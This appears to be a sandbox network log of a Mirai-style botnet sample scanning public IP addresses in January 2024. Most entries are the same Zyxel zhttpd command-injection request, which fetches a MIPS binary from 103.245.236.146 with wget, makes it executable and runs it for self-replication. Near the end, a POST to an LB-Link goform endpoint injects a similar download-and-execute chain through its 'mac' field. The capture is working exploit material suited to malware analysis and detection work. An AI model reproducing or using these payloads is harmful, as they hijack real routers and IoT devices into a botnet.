                                                Jan 28, 2024 10:16:20.746505022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3336192.168.2.233383693.254.125.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746553898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3337192.168.2.2344654158.130.220.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746579885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3338192.168.2.234838280.24.66.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746584892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3339192.168.2.2357582174.207.113.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746634007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3340192.168.2.2360422130.147.244.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746646881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3341192.168.2.235352813.243.206.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746649981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3342192.168.2.2336408136.43.72.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746654987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3343192.168.2.235060496.14.69.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746668100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3344192.168.2.2349756140.116.155.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746738911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3345192.168.2.2336584107.104.171.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746774912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3346192.168.2.2339508174.14.164.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746808052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3347192.168.2.236063699.15.65.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746828079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3348192.168.2.2340850140.134.21.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746860027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3349192.168.2.2334842139.91.47.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746884108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3350192.168.2.2352354160.33.235.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746896029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3351192.168.2.2348112115.233.87.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746917963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3352192.168.2.2336142222.204.250.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746967077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3353192.168.2.2337254115.147.190.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746973991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3354192.168.2.234394490.53.125.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.746994019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3355192.168.2.234038443.165.180.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747023106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3356192.168.2.234991251.112.235.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747083902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3357192.168.2.2340342137.122.53.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747083902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3358192.168.2.2333606192.211.252.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747114897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3359192.168.2.234674634.58.89.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747169971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3360192.168.2.233524679.235.113.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747191906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3361192.168.2.2335878192.93.6.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747201920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3362192.168.2.2338236158.132.202.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747226000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3363192.168.2.2352216153.246.36.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747256994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3364192.168.2.2358550176.92.52.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747312069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3365192.168.2.233565844.204.218.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747322083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3366192.168.2.2348622219.47.13.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747339010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3367192.168.2.2337822106.195.129.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747366905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3368192.168.2.2336518157.185.184.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747387886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3369192.168.2.235910492.163.123.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747448921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3370192.168.2.2343560222.236.189.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747473955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3371192.168.2.2354838190.15.197.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.747484922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3372192.168.2.235281690.206.204.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.749918938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3373192.168.2.233990441.167.186.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.749934912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3374192.168.2.234385453.97.247.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750380993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3375192.168.2.234385490.120.255.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750391006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3376192.168.2.2343854153.205.165.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750412941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3377192.168.2.235191679.23.200.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750550032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3378192.168.2.234456863.188.2.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750565052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3379192.168.2.234524412.108.58.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750586033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3380192.168.2.2342148150.152.177.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750608921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3381192.168.2.2360450130.128.40.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750626087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3382192.168.2.2359668111.100.209.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750642061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3383192.168.2.2343300142.130.62.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750701904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3384192.168.2.235823640.11.214.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750701904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3385192.168.2.2350380159.168.52.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750725985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3386192.168.2.234075876.211.146.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750751972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3387192.168.2.233975670.203.154.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750787973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3388192.168.2.2352198106.71.228.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750803947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3389192.168.2.2360250198.90.203.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750822067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3390192.168.2.233555843.222.172.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:20.750847101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3391192.168.2.2339414154.12.198.178080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.036166906 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 28, 2024 10:16:21.160355091 CET1286INHTTP/1.1 400 Bad Request
                                                Server: squid/3.5.20
                                                Mime-Version: 1.0
                                                Date: Sun, 28 Jan 2024 09:13:16 GMT
                                                Content-Type: text/html;charset=utf-8
                                                Content-Length: 3468
                                                X-Squid-Error: ERR_INVALID_URL 0
                                                Connection: close
                                                Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 